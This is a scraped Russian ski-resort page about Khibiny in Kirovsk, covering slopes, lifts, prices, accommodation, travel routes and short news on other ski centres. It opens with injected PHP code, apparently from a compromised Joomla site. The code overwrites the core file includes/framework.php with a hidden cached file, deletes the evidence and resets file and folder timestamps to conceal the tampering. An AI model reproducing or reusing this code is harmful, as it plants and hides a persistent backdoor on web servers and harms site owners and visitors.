$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Хибины Кировск | горнолыжки
Баннер

Хибины

Кировск

Описание

Обсудить на форуме...

Посмотреть красивые фото

[горы Хибины на карте ]

Хибины Кировск один из немногих горнолыжных курортов за Полярным кругом. Одним из главных полюсов Хибин России это невысокие цены как на подъёмники так и на проживание. Городок Кировск достаточно тихий, не опасаясь можно гулять вечером, посещать увеселительные заведения.

В Кировске существует четыре основных горнолыжных склона:  Северный "КолаСпортЛэнд" и Южный "Большой Вудъявр"
склон горы Айкуайвенчорр, гора Кукисвумчорр и самая новая трасса  ХибиныСноуПарк.

Некоторые отзывы можно почитать на форуме.

Но прежде чем отправляться на курорт посмотрите что твориться с погодой и что на трассах.

Характеристики склонов

Основной склон это безусловно северный склон горы Айкуайвенчорр. Местные этот склон называют "Городским" из-за его близости к центру города. Он находиться в 15-20 минутах ходьбы от центра города, а если вы поселились на улице Олимпийской то и вовсе 5 минут. протяженность трасс этого склона полтора-два километра, перепад высот 600м. Склоны оборудованы 6 бугельными подъёмниками и одним кресельным. Кресельный подъёмник существует ещё с советских времён поэтому его надёжность под сомнением. Не так давно из-за слетевшего троса погиб один горнолыжник и получили травмы ещё несколько. Но зато на этом подъёмнике вы на свой страх и риск можете добраться до самой вершины горы Айкуайвенчорр без остановок.

Несомненно самые популярные считаются трассы подъёмника "Латвия". Очень длинные, солнечные и не очень сложные. Если скатываться по склону влево то можно легко доехать до гостиниц и даже до города. Это несомненно очень удобно, чтобы не тащить пол часа снаряжение пешком.

 

Тип курорта: горнолыжный
Сезон катания: с ноября по май

Подъемники

Всего : 15
Гондольных: 0
Кресельных: 1
Бугельных: 14

Склоны

Перепад высот: 620м
Трасс/подъемников:23\15
Протяженность трасс: 30 000 м
Ночное освещение: да.
Искусственное оснежение: нет.

Сложность трасс

Зелёные: 20%
Красные: 60%
Черные: 20%

Время работы

Понедельник - воскресенье: с 9:00 до 16:00.

Удобства

Множество горнолыжных школ, кафе, баров, ресторанов, бассейн, боулинг.

Размещение

Квартиры в городе, гостиницы вокруг склонов (Северная, Спорт, Эккос, Горница, Хибины, профилакторий Тирвас). Стоимость от 250 до 1200 руб\сут.

Как добираться

Как доехать до Хибины Кировск

[ГЛК Хибины Россия на карте]

 

самолётом

До аэропорта Мурманска или Аппатитов, затем на такси или пригородными автобусами до Кировска.

поездом

До станций Аппатиты, затем на автомобиле или автобусе (автобусы №131, 102, 105, 130а и маршрутка 131) до Кировска (около 50 км). Дорога от Москвы до Аппатитов займёт около полутора суток.

на автобусе

Непосредственно до Кировска.

на автомобиле

Через Мурманск до Аппатитов.

Контакты

г.Кировск, Мурманская область.

Цены

Хибины Кировск Цены

SkiPass на день – 400-600 рублей, на неделю – 2200-2500 рублей.

Разовый – 30-60 рублей.

Для проживающих в гостинице Спорт действуют скидки на подъемники.

Прокат: от 600 до 800 рублей в день. Залог от 5 тысяч до 15 тысяч рублей.

Праздничные дни дороже процентов на десять.


Коментарии:

 
.

Последние новости

Популярные статьи

Новости
Открытие сезона на ГЛЦ "Царевщина"

Ну вот и дождались любители горных лыж и сноуборда открытия ГЛЦ "Царевщина". Сегодня был полноценный рабочий день на этом комплексе. Снегу накидали достаточно, земли нигде не видно. В некоторых местах есть лёд. Народу немного, на подъёмнике очередей нет. Цены остались на уровне прошлого сезона: 1 смена с 10 до 15 - 600р, 2 смена с 13 до 17 - 700р, 3 смена с 17 до 21 - 300р (в выходные дни). В будние дни соответственно 250 - 300 - 200руб. Работает как всегда только центральная трасса.

 
Новости ГЛК Красная глинка

По заявлениям представителей ГЛК  Красная Глинка, что неподалёку от Самары, открытие намечено не 2 декабря, в настоящее время активно идёт подготовка склонов. На Юге убрали не работающий подъемник, трасса стала шире. Сейчас снежат Восточный склон. К открытию скорее всего будут работать Центр, Восток и если успеют то и Юг.

 
Появился новый раздел "Народный магазин"
Подробнее ...
Хибины Кировск | горнолыжки

Как доехать на машине
*От:
*До:
Дай +1 :)
Сохранить в моб...
Яндекс.Метрика